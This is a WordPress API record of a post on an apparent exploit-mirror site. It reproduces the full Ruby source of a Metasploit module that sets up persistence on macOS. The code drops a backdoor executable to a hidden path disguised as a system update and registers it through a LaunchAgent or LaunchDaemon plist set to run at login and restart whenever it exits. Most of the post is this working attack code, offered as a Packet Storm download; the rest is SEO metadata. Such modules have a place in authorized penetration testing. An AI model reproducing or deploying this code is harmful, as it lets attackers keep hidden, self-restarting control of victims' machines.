{"id":20372,"date":"2025-10-06T11:34:56","date_gmt":"2025-10-06T11:34:56","guid":{"rendered":"http:\/\/localhost\/?p=20372"},"modified":"2025-10-06T11:34:56","modified_gmt":"2025-10-06T11:34:56","slug":"mac-os-x-persistent-payload-installer","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=20372","title":{"rendered":"\ud83d\udcc4 Mac OS X Persistent Payload Installer_PACKETSTORM:210191"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-10-06T16:16:29&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module provides a persistent boot payload by creating a launch item,&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Mac OS X Persistent Payload Installer&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:210191&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    require &#8216;shellwords&#8217;\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Local\\n      Rank = ExcellentRanking\\n    \\n      include Msf::Post::Common\\n      include Msf::Post::File\\n      include Msf::Exploit::EXE\\n      include Msf::Exploit::Local::Persistence\\n      prepend Msf::Exploit::Remote::AutoCheck\\n      include Msf::Exploit::Deprecated\\n      moved_from &#8216;exploits\/osx\/local\/persistence&#8217;\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;Mac OS X Persistent Payload Installer&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              This module provides a persistent boot payload by creating a launch item, which can be\\n              a LaunchAgent or a LaunchDaemon. LaunchAgents run with user level permissions and are triggered\\n              upon login by a plist entry in ~\/Library\/LaunchAgents. LaunchDaemons run with\\n              elevated privilleges, and are launched before user login by a plist entry in the ~\/Library\/LaunchDaemons directory.\\n              In either case the plist entry specifies an executable that will be run before or at login.\\n    \\n              Verified on OSX 11.7.10 (Big Sur)\\n            },\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;Author&#8217; =\\u003e [ \\&#8221;Marcin &#8216;Icewall&#8217; Noga \\u003cmarcin[at]icewall.pl\\u003e\\&#8221;, &#8216;joev&#8217; ],\\n            &#8216;Targets&#8217; =\\u003e [\\n              [ &#8216;Mac OS X x64 (Native Payload)&#8217;, { &#8216;Arch&#8217; =\\u003e ARCH_X64, &#8216;Platform&#8217; =\\u003e [ &#8216;osx&#8217; ] } ],\\n              [ &#8216;Mac OS X x86 (Native Payload for 10.14 and earlier)&#8217;, { &#8216;Arch&#8217; =\\u003e ARCH_X86, &#8216;Platform&#8217; =\\u003e [ &#8216;osx&#8217; ] } ],\\n              [ &#8216;Mac OS X Apple Sillicon&#8217;, { &#8216;Arch&#8217; =\\u003e ARCH_AARCH64, &#8216;Platform&#8217; =\\u003e [&#8216;osx&#8217;] }],\\n              [ &#8216;Python payload&#8217;, { &#8216;Arch&#8217; =\\u003e ARCH_PYTHON, &#8216;Platform&#8217; =\\u003e [ &#8216;python&#8217; ] } ],\\n              [ &#8216;Command payload&#8217;, { &#8216;Arch&#8217; =\\u003e ARCH_CMD, &#8216;Platform&#8217; =\\u003e [ &#8216;unix&#8217; ] } ],\\n            ],\\n            &#8216;DefaultTarget&#8217; =\\u003e 0,\\n            &#8216;SessionTypes&#8217; =\\u003e [ &#8216;shell&#8217;, &#8216;meterpreter&#8217; ],\\n            &#8216;DisclosureDate&#8217; =\\u003e &#8216;2012-04-01&#8217;,\\n            &#8216;Platform&#8217; =\\u003e [ &#8216;osx&#8217;, &#8216;python&#8217;, &#8216;unix&#8217; ],\\n            &#8216;References&#8217; =\\u003e [\\n              [&#8216;URL&#8217;, &#8216;https:\/\/taomm.org\/vol1\/pdfs\/CH%202%20Persistence.pdf&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/developer.apple.com\/library\/archive\/documentation\/MacOSX\/Conceptual\/BPSystemStartup\/Chapters\/CreatingLaunchdJobs.html&#8217;],\\n              [&#8216;ATT\\u0026CK&#8217;, Mitre::Attack::Technique::T1647_PLIST_FILE_MODIFICATION]\\n            ],\\n            &#8216;Notes&#8217; =\\u003e {\\n              &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n              &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION, EVENT_DEPENDENT],\\n              &#8216;SideEffects&#8217; =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES, SCREEN_EFFECTS] # Pop-up on 13.7.4\\n            }\\n          )\\n        )\\n    \\n        register_options([\\n          OptString.new(&#8216;BACKDOOR_PATH&#8217;,\\n                        [\\n                          true, &#8216;Path to hide the backdoor on the target.&#8217;,\\n                          &#8216;~\/Library\/.\\u003crandom\\u003e\/com.system.update&#8217;\\n                        ]),\\n          OptBool.new(&#8216;KEEPALIVE&#8217;,\\n                      [true, &#8216;Continually restart the payload exe if it crashes\/exits.&#8217;, true]),\\n          OptBool.new(&#8216;RUN_NOW&#8217;,\\n                      [false, &#8216;Run the installed payload immediately.&#8217;, false]),\\n          OptEnum.new(&#8216;LAUNCH_ITEM&#8217;, [true, &#8216;Type of launch item, see description for more info. Default is LaunchAgent&#8217;, &#8216;LaunchAgent&#8217;, %w[LaunchAgent LaunchDaemon]])\\n        ])\\n        deregister_options(&#8216;WritableDir&#8217;)\\n      end\\n    \\n      def check\\n        folder = File.dirname(backdoor_path).shellescape\\n        folder = File.dirname(folder)\\n        return CheckCode::Safe(\\&#8221;#{folder} not found\\&#8221;) unless exists?(folder)\\n        return CheckCode::Safe(\\&#8221;#{folder} not writable\\&#8221;) unless writable?(folder)\\n    \\n        CheckCode::Appears(\\&#8221;#{folder} is writable\\&#8221;)\\n      end\\n    \\n      def install_persistence\\n        check_for_duplicate_entry\\n    \\n        if target[&#8216;Arch&#8217;] == ARCH_PYTHON\\n          payload_bin = \\&#8221;#!\/usr\/bin\/env python\\\\n\\&#8221; + payload.encoded\\n        elsif target[&#8216;Arch&#8217;] == ARCH_CMD\\n          payload_bin = \\&#8221;#!\/usr\/bin\/env bash\\\\n\\&#8221; + payload.raw\\n        else\\n          payload_bin = generate_payload_exe\\n        end\\n    \\n        # Store backdoor on target machine\\n        write_backdoor(payload_bin)\\n        # Add plist file to LaunchAgents dir\\n        add_launchctl_item\\n        @clean_up_rc \\u003c\\u003c \\&#8221;rm #{plist_path}\\\\n\\&#8221;\\n        @clean_up_rc \\u003c\\u003c \\&#8221;execute -f \/bin\/launchctl -a \\\\\\&#8221;stop  #{File.basename(backdoor_path)}\\\\\\&#8221;\\\\n\\&#8221;\\n        @clean_up_rc \\u003c\\u003c \\&#8221;execute -f \/bin\/launchctl -a \\\\\\&#8221;remove  #{File.basename(backdoor_path)}\\\\\\&#8221;\\\\n\\&#8221;\\\\\\n      end\\n    \\n      private\\n    \\n      # drops a LaunchAgent plist into the user&#8217;s Library, which specifies to run backdoor_path\\n      def add_launchctl_item\\n        label = File.basename(backdoor_path)\\n        cmd_exec(\\&#8221;mkdir -p #{File.dirname(plist_path).shellescape}\\&#8221;)\\n        # NOTE: the OnDemand key is the OSX \\u003c 10.4 equivalent of KeepAlive\\n        item = \\u003c\\u003c-EOF\\n        \\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221;?\\u003e\\n        \\u003c!DOCTYPE plist PUBLIC \\&#8221;-\/\/Apple\/\/DTD PLIST 1.0\/\/EN\\&#8221; \\&#8221;http:\/\/www.apple.com\/DTDs\/PropertyList-1.0.dtd\\&#8221;\\u003e\\n        \\u003cplist version=\\&#8221;1.0\\&#8221;\\u003e\\n          \\u003cdict\\u003e\\n            \\u003ckey\\u003eLabel\\u003c\/key\\u003e\\n            \\u003cstring\\u003e#{label}\\u003c\/string\\u003e\\n            \\u003ckey\\u003eProgram\\u003c\/key\\u003e\\n            \\u003cstring\\u003e#{backdoor_path}\\u003c\/string\\u003e\\n            \\u003ckey\\u003eProgramArguments\\u003c\/key\\u003e\\n            \\u003carray\\u003e\\n              \\u003cstring\\u003e#{backdoor_path}\\u003c\/string\\u003e\\n            \\u003c\/array\\u003e\\n            \\u003ckey\\u003eRunAtLoad\\u003c\/key\\u003e\\n            \\u003ctrue\/\\u003e\\n            \\u003ckey\\u003eOnDemand\\u003c\/key\\u003e\\n            \\u003c#{keepalive?}\/\\u003e\\n            \\u003ckey\\u003eKeepAlive\\u003c\/key\\u003e\\n            \\u003c#{keepalive?}\/\\u003e\\n          \\u003c\/dict\\u003e\\n        \\u003c\/plist\\u003e\\n        EOF\\n    \\n        if write_file(plist_path, item)\\n          print_good(\\&#8221;LaunchAgent added: #{plist_path}\\&#8221;)\\n          @clean_up_rc \\u003c\\u003c \\&#8221;rm #{plist_path}\\\\n\\&#8221;\\n        else\\n          fail_with(Failure::UnexpectedReply, \\&#8221;Error writing LaunchAgent item to #{plist_path}\\&#8221;)\\n        end\\n    \\n        if run_now?\\n          cmd_exec(\\&#8221;launchctl load -w #{plist_path.shellescape}\\&#8221;)\\n        else\\n          print_warning(\\&#8221;To manually launch payload: launchctl load -w #{plist_path.shellescape}\\&#8221;)\\n        end\\n    \\n        print_good(&#8216;LaunchAgent installed successfully.&#8217;)\\n      end\\n    \\n      # path to upload the backdoor. any \\u003cuser\\u003e or \\u003crandom\\u003e substrings will be replaced.\\n      # @return [String] path to drop the backdoor payload.\\n      def backdoor_path\\n        @backdoor_path ||= datastore[&#8216;BACKDOOR_PATH&#8217;]\\n                           .gsub(&#8216;\\u003crandom\\u003e&#8217;) { Rex::Text.rand_text_alpha(8) }\\n                           .gsub(%r{^~\/}, \\&#8221;\/Users\/#{user}\/\\&#8221;)\\n      end\\n    \\n      # raises an error if a Launch Agent already exists at desired same plist_path\\n      def check_for_duplicate_entry\\n        if file?(plist_path)\\n          fail_with &#8216;FileError&#8217;, \\&#8221;Duplicate LaunchAgent plist already exists at #{plist_path}\\&#8221;\\n        end\\n      end\\n    \\n      # @return [Boolean] user wants the persistence to be restarted constantly if it exits\\n      def keepalive?\\n        datastore[&#8216;KEEPALIVE&#8217;]\\n      end\\n    \\n      # path to the LaunchAgent service configuration plist\\n      # @return [String] path to the LaunchAgent service\\n      def plist_path\\n        @plist_path ||= \\&#8221;\/Users\/#{user}\/Library\/#{datastore[&#8216;LAUNCH_ITEM&#8217;]}s\/#{File.basename(backdoor_path)}.plist\\&#8221;\\n      end\\n    \\n      # @return [Boolean] user wants to launch the LaunchAgent immediately\\n      def run_now?\\n        datastore[&#8216;RUN_NOW&#8217;]\\n      end\\n    \\n      # @return [String] username of the session\\n      def user\\n        @user ||= cmd_exec(&#8216;whoami&#8217;).strip\\n      end\\n    \\n      # drops the file to disk, then makes it executable\\n      # @param [String] exe the executable to drop\\n      def write_backdoor(exe)\\n        print_status(&#8216;Dropping backdoor executable&#8230;&#8217;)\\n        cmd_exec(\\&#8221;mkdir -p #{File.dirname(backdoor_path).shellescape}\\&#8221;)\\n    \\n        if write_file(backdoor_path, exe)\\n          print_good(\\&#8221;Backdoor stored to #{backdoor_path}\\&#8221;)\\n          cmd_exec(\\&#8221;chmod +x #{backdoor_path.shellescape}\\&#8221;)\\n          @clean_up_rc \\u003c\\u003c \\&#8221;rm #{backdoor_path}\\\\n\\&#8221;\\n        else\\n          fail_with(Failure::UnexpectedReply, \\&#8221;Error dropping backdoor to #{backdoor_path}\\&#8221;)\\n        end\\n      end\\n    end&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/210191&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/210191\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-10-06T16:16:29&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module provides a persistent boot payload by creating a launch item,&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Mac OS X Persistent Payload Installer&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:210191&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-20372","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Mac OS X Persistent Payload Installer_PACKETSTORM:210191 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=20372\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Mac OS X Persistent Payload Installer_PACKETSTORM:210191 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-10-06T16:16:29&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module provides a persistent boot payload by creating a launch item,&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Mac OS X Persistent Payload Installer&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:210191&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##n # This module requires Metasploit: https:\/\/metasploit.com\/downloadn...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=20372\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-10-06T11:34:56+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20372#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20372\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Mac OS X Persistent Payload Installer_PACKETSTORM:210191\",\"datePublished\":\"2025-10-06T11:34:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20372\"},\"wordCount\":1383,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=20372#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20372\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20372\",\"name\":\"\ud83d\udcc4 Mac OS X Persistent Payload Installer_PACKETSTORM:210191 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-10-06T11:34:56+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20372#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=20372\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20372#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Mac OS X Persistent Payload Installer_PACKETSTORM:210191\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Mac OS X Persistent Payload Installer_PACKETSTORM:210191 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=20372","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Mac OS X Persistent Payload Installer_PACKETSTORM:210191 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-10-06T16:16:29&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module provides a persistent boot payload by creating a launch item,&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-10-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Mac OS X Persistent Payload Installer&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:210191&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##n # This module requires Metasploit: https:\/\/metasploit.com\/downloadn...","og_url":"https:\/\/zero.redgem.net\/?p=20372","og_site_name":"zero redgem","article_published_time":"2025-10-06T11:34:56+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=20372#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=20372"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Mac OS X Persistent Payload Installer_PACKETSTORM:210191","datePublished":"2025-10-06T11:34:56+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=20372"},"wordCount":1383,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=20372#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=20372","url":"https:\/\/zero.redgem.net\/?p=20372","name":"\ud83d\udcc4 Mac OS X Persistent Payload Installer_PACKETSTORM:210191 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-10-06T11:34:56+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=20372#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=20372"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=20372#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Mac OS X Persistent Payload Installer_PACKETSTORM:210191"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/20372","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20372"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/20372\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20372"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20372"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20372"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}